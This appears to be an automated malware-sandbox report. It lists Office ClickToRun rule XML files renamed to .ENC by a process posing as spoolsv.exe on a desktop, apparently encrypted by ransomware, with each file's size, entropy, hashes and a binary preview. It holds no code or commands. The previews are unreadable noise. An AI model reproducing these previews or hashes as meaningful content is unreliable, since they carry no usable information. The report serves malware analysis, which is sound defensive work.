                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..c.\u._..R........q..:S.....`....(...=_Gd.r.u..Uz.FCwZ.....+...U. |..R...D.Mkr._d/.F....p9..C3....ys....W.>...&..$|'......^......._.S7..k......G...-..M1jdn._.V"..).zM`.y.;1......h;!..Y.......]f.|.c..."q......=|...5o..=..i..E.O.z..:Rb...s.9....D.>E.......u..T.}jPS....O..=.Z.:.>V-...%..7+3M.b~J..y....I.`..mx...l.@..|Z.uW4 ^S`"..l.!u!..t.].7W.K...C

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120622v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.576758070726425
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2a1sNRtzZ1mNIsgj+o9zueeh1ymM2RSG81LGnzc5wnKLg:/VNRBznsA9Hec2D81gIG4g
                                                                                                                                                                                                                                                      MD5:A888B571EA2399FC5E9543AFD3DE8D1A
                                                                                                                                                                                                                                                      SHA1:22908A92F957B729FEC21DDB1B41C630CAD8B721
                                                                                                                                                                                                                                                      SHA-256:100CB8EC5471E2FA494E10BB62861F163B9104B9B998A1F90FB7242198A02C4B
                                                                                                                                                                                                                                                      SHA-512:EE6EB36E5B353627EEA4D7D8478FAD3C5C1D4306B85BF5868599B5C2A52E947E2175DDCD3D80EA13672928AEFCD17085C263A57A87B783F9EF5BCE44393E6818
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...x.z....P.4.oR....;..%I.^<.Eh...}.v.yWp.R.o...W.p...........Qd.u.j...9B...y.)(B.......K..M..|.@..-.<......R.....u..0*..>...Th..t.+mv...].lN&\...D7=.j.Vp.47...g|......_.^R.Z.Z..B..l....._......:....B-n..+|.eX.-1a-+....v.........a2%W.a.t.+..[..}=....^p...x....?.j.i..k,...1.'.@......-...AR@..........L..ynSo...2.........C.U...w.c"V.s.x._..7h;.$.....q.L..@[(.w.a.."X.....Sf.O.......n.3.].....>. ..L......q.=.Ru

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120623v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.533377731078317
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s245Ll7zSX597AKfMhmugiZvSUyqYWvmhED/SFQXc7:/U5Ll2zAKfgXbZaUyYvmhqIQI
                                                                                                                                                                                                                                                      MD5:F1710BB5084BC610EB7AF2EDBEF7A202
                                                                                                                                                                                                                                                      SHA1:89C14DF263D931FF06B9A3B6568F9301B40A6B19
                                                                                                                                                                                                                                                      SHA-256:C494203B625BEFAF4774AB118545425DAC59334DA93844F33ED76FD557290D4E
                                                                                                                                                                                                                                                      SHA-512:4CB477962FBFD9DE779CE5051D1AF6E8BAF78DA5166C585CEFD7AC82AC4E49E1C3B55A9C3725FF724A06E3977FB7C581BF76345AD95C884492573CE83A84B7CA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...]0..o.n.;.Bl..0d.......B!g7;..._.lr.9...?r<..tD...#....I..B..)....J.&W..A.......G.`u..Jx.....,p;......B..<4tg."Fc.2.7....q.@.ak].-./../N4?.Bk.:?B.0(T.....B..?W...x!_SR)....sI#.AP...<Yol....2.%...%N....>/l.)0..9oP,.f..K+......).zo.m.18.......!...4..l.-Q..W.u.....6..p.b....L.7...7R.c..R.:.|D...gx...*..:P.......p....#.............e..QK.]...U.D.....X..m+..$...s\h.=......G...+g..+.........!W.,..m.np..'.r

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120624v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.533932098969927
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2CdXY4qrKm3eJ1JvYh+eZ0dtl2IhDo7FPzx5nQ34QdZXwPcx:/OC4qrKmuJLvuPLrnQ3ldZKG
                                                                                                                                                                                                                                                      MD5:573585C1B9F0047A48B40C35EFC33138
                                                                                                                                                                                                                                                      SHA1:03067EF85B9C2BD9BBE1D1B6455DC0D27D47623A
                                                                                                                                                                                                                                                      SHA-256:D6CAAA3F4D09605975546FC1CBF5F2F59C3BB591578875DF655848B480F30D24
                                                                                                                                                                                                                                                      SHA-512:682277670E534FB39A5271D98E63B2BF6560CC501BAEDD3A61072EC91FD9285465B895FF4B7D4838C11A4F900A996F5E3C72BD48F902691E34D94C9328D7F799
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.dZ."......z./....s.D.../.nd.8..U#L%....J-.W.....a......,...4[..4B..?N....;+=.~.O.....E..f...VS{....D...b.e.x.....{...P..X*......=..!...x...GC...e.$.8.'LU.Wn.........a....t...[....a.8.U.1.e.O^..3...-......R8.b..76.W?L7..,..e....%....}.Z......J....`.k.<......G%a....Z.$.[.*a...W.5.}.a....D....d.U......cJ...zg..."q...l,]"..Y.LVe..YsE(.i&Y..n .qttu.W...6.Z....l.5...t..P.g.dV.a...=!.pO.-u..Tz`...YW..T)#..}..D.....m*'M.-O.L.....6

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120625v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.551403691906315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2+Vb0n1HHnhwAHF60NhDZGQT+GTh0bpzBrS5RP:/q0nhXA+dDqbTrSzP
                                                                                                                                                                                                                                                      MD5:7FEFB0B06D05D0B3A54E667999E56431
                                                                                                                                                                                                                                                      SHA1:EDC5B4083C73697CA84287FDC1C989948A511149
                                                                                                                                                                                                                                                      SHA-256:9C4EC2D4753F229E7D46A632E6FE7424F3DC9B9C19891FFDEED5BAF79811EDC8
                                                                                                                                                                                                                                                      SHA-512:FD70DCCCF476DC63F604F503DA97D52A85E999D7A0010F9A1D997FCCEF4308B519132DAE0DDC86F66DBDBB86C7FC487EAD3C3F69E42D66D46189E199EC0CB17E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.tT.+..m.I.)m<+^Q.g1i..{..V..H..0k.S.X....,s......6+........\....%|".. ...$.fD....<+1..j#..)..R.?.?...Q...5PZA.B...^_.=.'s.~<:..8.j..........D:..o......5...-.z.c.1.^i.}h.w.&..Q..q....N<-f6b.k.....5%L..1c..u^.V...c..*.;...@.(83\.....lf..N....f...P$o,O.}..Z4...I....co?..<l.<iY.S..F.....S./x..}g.....&.C.E(d.:.Fh...t.........g......BrL......4...}..e(7%.!t.." .@......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120626v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.583063195903054
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s24VqqCOzq5ywo4HAfWXMseSkfe86IUlvHEKDVAzkSA:/Zp7BHyW8UG6zJkqIS
                                                                                                                                                                                                                                                      MD5:71FCA311CFEC3F3181BB8BA23E3E8128
                                                                                                                                                                                                                                                      SHA1:56AC51A5FE0526F02A98B24AA2415F3B650A7CD2
                                                                                                                                                                                                                                                      SHA-256:7301490E52FE17E4C11A180AC61FEB608E6BCD8579F7E005144CCEF4AF5E5C76
                                                                                                                                                                                                                                                      SHA-512:9C8435D71773099A024950A7E3D6DF7ADEB2314173716C96C4EDF8BC2C9A013775501CC770F12B2C3689BE58299C4F32011CCEF1658F6735CED13F5E31BA88FC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....*...Y..c.-....M...{h..9.e.....Q{.Z...6..b.....-...rJY..Z.Yt...Z.ezUAp.~.......M...+.....b..~9....YK._.F@.6....n..Ah.}..S..i.w_v.ue.......u..D......nA\..^.....E...k\;..);`...l<U.Y.^".I~.si..;jnk.V...G...%v.|..R..wL.9P..x....m.....G.m.........tc..|.J..h#....#.m*.:......J....../.T..j.....A.D.p..*...q..b..@.....3.J.q4E..uV.-..pE'.p?n*j...a....<].....E..:J.f....2..=...H..Bfy.*R.....}....^.../Z.d.)U..ry...nb.....s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120627v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.4445039850932355
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2GctzkekQMbe6wQ2Gq/+AvOEAit1gASbB+Z:/LdkeTWePR/+AvpcASEZ
                                                                                                                                                                                                                                                      MD5:9FF89F14668DA7806C8681E9FEE6064E
                                                                                                                                                                                                                                                      SHA1:1636845415C2562DB0C180402970378DFA9A31D7
                                                                                                                                                                                                                                                      SHA-256:43831546337E5DE8D51F95E85C9A419ABBEFC2E5BA5F2C0EC8918D1216B8644E
                                                                                                                                                                                                                                                      SHA-512:3A259EC9363D4EC487E2F117CCE2CF9EBF504C9B981200D768CFAA04F817DEA4028DFE4D50F1834F0F034C9D32BEB647C88AC8C5C1FD86B6AB079BB3C2B8AEBE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....e-.....>F..........Hrfx.Zs..M..].0.v.1...=.rm....(l.)[#..........r.....`NS............M...M.C2..=.v.....<..O.3-.|..!m....R..=6.!...P.e(.i.B..\..c..h.......QlY...e..+N.&%..GP.].qf..[.......I.......:...t...~..........r.:4(...c.....C...f_4.pi.#i..%..]..SN}...F....P$..q,..%.!.j..qI.U..P.44..@...p.*.U.-N...h..u{..[.hv.Abi$.#n00%..T...q.4.B...|.=a.!..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120628v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.614010597928625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2esSGfo9S3fF1sTHMc9MV7UfKgRHMkiGsyoCLwh0np0:/asSI892u39MRGsCk+a
                                                                                                                                                                                                                                                      MD5:804620225DE5D5369D4AC0BD35ACDD8D
                                                                                                                                                                                                                                                      SHA1:402226A8C981C76F47E9ABB6A40B76FB551F0F8E
                                                                                                                                                                                                                                                      SHA-256:7C9D9B7EE7704A7A772F4DABC5BEE7214A52528EB6B32B196496D5E87A8CF5CE
                                                                                                                                                                                                                                                      SHA-512:AC75E63FC36FE8F996D07D0942B5B4B7F6FD497E24CB08047480010BA1C449FFA011743E3D8DE58BBCFE756A38406760191930A7FB76B1585507E69421DE5308
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.II.c.....0...{h0j...G..3..y...4...H..%...a.R@....T..."-l0../o.....#-....@.m.*...UZ<k.....w1.......|..y|:tj.....reEe..:..=..YD.)...m...?...J.....#.y.zm.r...{......$2.|NN.^...A..$c.3z..\`..v.bY.....A.......k..........)b.&..k..O...~@.Dj.i....G.W..!...5[l.|S...}..4..........Ig*....U,.0$.G...t8O2^.......%.^.|e....y.M...J_...*...d..R..7V).rE..gq.t.a.R..FRu.S.x.qM..d.J..'....'..r.S....3....J2la;... ..4..F+..VS..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120629v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.550238197776645
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2I7JD20udc8biC6hnDDzTI4XIV8jAiV9PPgn:/CQeFLI4XIGjvV9w
                                                                                                                                                                                                                                                      MD5:73EB26B2B2270E89276F514CBA89D38B
                                                                                                                                                                                                                                                      SHA1:621720205958FEDD6E3F7C3A179B7314BA0DA1A7
                                                                                                                                                                                                                                                      SHA-256:F00B3300C8858AEC44D89159EDD9E6F34665D2739CC1533D4422AA28BB7936B0
                                                                                                                                                                                                                                                      SHA-512:29B7DB4A1251FEAB19081513A15B3A4EB4ABCD9F9D15579B2964BB19EA97D2448CF884313281807AD56D0D3B8AE4DC9C677D4B7E83AD760BBACF5D12843EA447
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t."..K`.X:.t..n.T`)x...........iCmO..._...C..z.%.G9.=....t.<T....bx..............h}.....H\o.f........U....*......L..Rb..3J..&..e..c.y.c.v+#}SPaT.u`.....`.L.T...........@...P|.B..cA.cKm....x.23}.%.D&...._..r.........w.@!~.k6m...J.vo..Z...Q..8.b. L.....o..k.....F.....Yc.+0..O,#......&(....jS.g........YF8vkPx....D..^..5..#.n..W..BW..".....l....R...*..3.K0.*.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120630v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                                                                                      Entropy (8bit):7.603121542477558
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2n+8JA8VEFTcolrsKzOxfUQP5zG79VH:/j9HVE1coCKzgMG5zG79F
                                                                                                                                                                                                                                                      MD5:C31A448CCF14EC5E1F9B7E3AE3C2F9BC
                                                                                                                                                                                                                                                      SHA1:DFD90040B686614B9F0BA345DF614BE3B15CEAE1
                                                                                                                                                                                                                                                      SHA-256:110F6A60A31850622BD836EC89A4D03D44642ADD1A378151CE4515175EDBD66D
                                                                                                                                                                                                                                                      SHA-512:AA6DD58E28A991D730189631E245E712558B13DF5DA3247D1938797F222CA180D0226EF78F266C0C12294B999AC1C62304B866C40B7236D7B22A63DB6915CA42
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...1. ...l<B.1.rZS4.6..I,..m.D+.+..P....O....V....X..PG...8#tYg...q.Y...L..N`@.....u....$],..$..L(I..s..'...-=.khM.9<.=!...wZ.4...H.........WD.$.3.pY....z.z..mj%...>..DFth..E.$....zB.X;.0...)<.3..o..E%.9.S+...Y................8.E...qH5X(G....j.P....c...G..._.K.i.w..X3....q..CL.....WZ8fM..L&.{.2.VN..{.:.$......Y.e"....3.3.s.Ey.m.ec.<..B.....M.]E.-G..L;......'z\,A...x...A.)~...4t.8...@....K.@.p..........z.$e.Zbol.>b.f..msJ}k.7..F..........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120631v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.458624905720463
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s2jGtsua7BlF7a2viMXpqQ05KyS2Koa0egU/poQPfPMWn3wTb5eqjpZw1lVD:/7s2FprX01KyS2VanR/poQRn3wTteE85
                                                                                                                                                                                                                                                      MD5:62720033707EB2D55B865895EF6C8D54
                                                                                                                                                                                                                                                      SHA1:F0CC74DCA145E02E7ADE33250EDAE7F8D694E67D
                                                                                                                                                                                                                                                      SHA-256:4A6BB566CAF5D519E4A6F95FFD1FB9E2BD05AC9A81886E7E286BA1F52CB9DA90
                                                                                                                                                                                                                                                      SHA-512:9FD9E80B729FE63C3D489F18076D3D3CDC49FF5BB5C16716BC5CD7DB8F4FABFEEB82B380C3EA4FB256E6FBDB311FA64EBA2982979686EB31EA5F08095CBAD6E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...%8....}/t...-y.;*\..y/..6>u.O..j.o.*....u...I.......B,....t..Jv.....d..o(........KN.B.......80.Ca .87.!\.;8.+....eG.7).].e...X...=.:(KN?....Tw#."......r....a.t...H.`#...(z......o...i..dU......5.,.v.].9..k@.O!....WOj,1Q.E..G`1.F......T....+..>.U.$-.I....y.IZ<.....95s&_g.*<..o......aQ..&n.q....J..q..B.L^.j4.@...A...P.>^....C...m...O....i...U|"A;U..m.;m......*.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120632v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.52962866379353
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2WFowgHZDLSKlqPx01+UwxSTGHR5wJ10cNT6AuzJPbn:/gIZDLS7x018S6HRWNVuJ
                                                                                                                                                                                                                                                      MD5:A57A850A69DC7EB6E86CBC67AE3A58C4
                                                                                                                                                                                                                                                      SHA1:61FCF1C7019368DB85699A8570A786E653D38155
                                                                                                                                                                                                                                                      SHA-256:3B71CAEBACBEE946F004771D1E848C21BA3606BBE07631DA9528456FECAF3340
                                                                                                                                                                                                                                                      SHA-512:FACBA502FFFD3DD2DCA0BAD0D10A3293F57A256A78898D26F821E2F35BF1B0645252B4C0C00E08B58936AB4C4DDA7BF9BAD8DAB9DE65AF672374F4D118BBDEAF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.{.....Lw.4.>..;7.Rd2.k.....5.k..d...e.7.y7.+V.S(.h4.....+3"..E...J..C....4....yF9m....[..6.?u-.=..J.ke..*..L.n.I...U..a'1.B..,|Z.m.+=....L.z.SP9,..n.C..~....).K.....4*M<..CG"X...4.........R.M^.PLx8L.a.....l....e#.|/.EL...{.d...h\HMu....{.....Xe.u...."&.m....:G..V.>3.3.EOb..2.8.@4..?.....H.Ri5.ZHF..+..X..e{.z1%I..D.S.?e.A.n[3.+~x..K..5.aj....AwN.3]N.{..ki...B.1...%$...n..e.....k....E$s.L..;....G.@.o./..t6G.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120633v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.508049395718353
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2rYGTUaqaJhWHy5Idjfm8UxxcNNFPBx+Mz/jUjddQOdVFgr6zkz:/VgajJwaSTm9YXRBxdzwjddhJXq
                                                                                                                                                                                                                                                      MD5:B5B19A2F9BA3E83B72210C9F1E9E023E
                                                                                                                                                                                                                                                      SHA1:9D2AF6F832B0D46614E120A98984C9649CD12D5B
                                                                                                                                                                                                                                                      SHA-256:AEEE02BCF292FCA24072A8CCDCB64EDFFC9B690CF786DB0ED13C82E3CC0A5B5C
                                                                                                                                                                                                                                                      SHA-512:3C0A3C3ED775AD13A8EC1F9E0D6A9C1971BFECE2DCEDBE959CA53DC95C2FD3512E3712C399FE483AD2A9C69532208B2BAD63449CD35E36EA74F167E163420148
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...L........D.G.E.P.5....@...6...^r8_....w<....f.M<0.....k...)V.v4..Z..z........_|.S4,SRSU.M.o...T.b.nW.....>.y...=D|g.......?'..zs..p.,e....|8J.Z...k.\/|C..B.e(a/.I?.?...+..........n.a.k...O..w...^...zFk0...W4q..[..q.zI..R...<"t.}I..>...*.a.8.N.M8.5..S1..J.R...\.......y,."Q.{1..vf.#....]..rD.A.-^.Y6...Z.@c.&Mw....I.w-.y4.u....J.%..o..U.p..&aUl3.0AZYU...nN...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120634v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.521193151624842
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2SM8UdD+3hVPISkVxldOjcVxkvwYVyJCka30i:/b8UdD+xprknTOjaGYNCx30i
                                                                                                                                                                                                                                                      MD5:CC12451AFDBBF614759401E65DCA26D3
                                                                                                                                                                                                                                                      SHA1:7FA03FCC35BCA4A6A3051CB250D75B8D921E2672
                                                                                                                                                                                                                                                      SHA-256:739EC0FA462A7F07FC57717C28E0D314F65C2FE7D4ABC9D37D4A486D01E532FC
                                                                                                                                                                                                                                                      SHA-512:26E4747D79A50287C66A84B2B7109B6E67729C55327DC01458510B902E7ED67006944B976E2D2D51E155304482AE47A74434D8798C6B2BC3CE58C02D4BBB4E55
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.E.\....`.........9........2X6...p2 ..V.0....d...8f?.Hq..e...h....SL.$.$`.....01..`..u=.]{.....|........u&..5...v..wn.7|0ia[...d0cr...Z.....M]i...N....Ye.....R./..`.(...R.s..T.{.0....!3!..A....Z.R^.j.....a.&..a.j..'...&....I....g.......df...`.nYI..P}M.XI.+^V..p......R....*.]..).l.&x?..p.c..^?hD(...yh.\,..Dm.Y^p,.TqX.P...^x..jP...-4.776].....2v.....d....N..|.).......u3....R.Z...|.....={u..$8 ....1...3.lQ.(........5...9.'

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120635v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.597840648972985
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2em9nxbfsfU00Wx3TYPa2+d874mMvs/D7+kFo7fXR1w://9nxzsfUDWtTYd6mMS6Mz
                                                                                                                                                                                                                                                      MD5:9F9CCD186DC51A4DC0EB48E2A8826F3E
                                                                                                                                                                                                                                                      SHA1:37F3E9291C8206E1B2AC0AEBCDB07E96BADC0189
                                                                                                                                                                                                                                                      SHA-256:9209BA1FEEFF6546AAAF54BF068270D3DA32AF366CC0013E8ABE09B6D54CEBAB
                                                                                                                                                                                                                                                      SHA-512:1A9D0BB2010F998591AD56A369EB5A06CD315B0B0ABBE6396C0FDD4A95A4AF2B2A5A9B04CBE42AAC3BDED9F62ECA7BFDEBA29B5DD141C23488442F152092ED19
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......c.8..'.Ky..;,5..&p:.2.p)o4.h..BN......[ ..;./H.B.Q...`..E....|..-.<........k.T.r...q.g.E.......\..j..0..n.o]r@.cPy.>...*,W..jc....I.(#E($.....,R.......A..Xck...A.).*U.c.*..d.L.o..Q....z..<U.."..Q...i....#.)..`..M.e.d..X..5.j..v3.x.6..&..$ss.-3..m.F.9ZxF!..Y.e...c;.}....)~B..1..."@G.&6R..J..N...11.w....*ot...3bj.O.H.{...Z.,..A..#.%....`.-_..V......9..(....+.u.Z..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120636v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.606737986404683
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s2f2VmT62NDuK1m6IKD4rje+ZQuLdBjb9q6yaPMOcOx21ZYkk8NyFWCAX+Y/:/7s2uUTHDuKs+DqXv970AMYiy5EguGcj
                                                                                                                                                                                                                                                      MD5:A972637C8724FB5B5E90BC08A54C99D0
                                                                                                                                                                                                                                                      SHA1:6FB8E7F2A0DFF580B7AB61F5D50335DC9A9860AA
                                                                                                                                                                                                                                                      SHA-256:91C2BE9392353330C03DF8CBEF3AB3D943847FA99EB41C1F81DA806D2FF03CC7
                                                                                                                                                                                                                                                      SHA-512:8822EE9E3AC12416470D3C64E155085444015FBB4396FBE785A9ECC745C914EFE5DB7532497854EDFF1744F516A7C5FAF4F4B2569BC57A2AF14FD873E95D5AA5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..K.kg..}<..kh.;.p..x..Q.<.....h...q.&...5B#......<&...Y.i.9h.*.. K.v....,.V.6-.rQ...dk..{B.x(j..P.m.|Q.=.s.......6.{[... .z.~....(KKd..dC.i#.f....s..[.o..r...J5.$.^r.9...?..q..FT. .Deq.\ M..._.'..7....tf...ms...W..x...I...5......S...'F9..:.a..U].=.s..).0........?..4.zF.u....`B..4v..=...3.o..{.cCn....I.7...J.....qm.tF..V....`].f*..R...>..An$.T.......{.&2.N.O..zN.w."..[+.......8p.(...)z.q.'%..{.SH/.^+@[n...z.Cm.9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120637v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
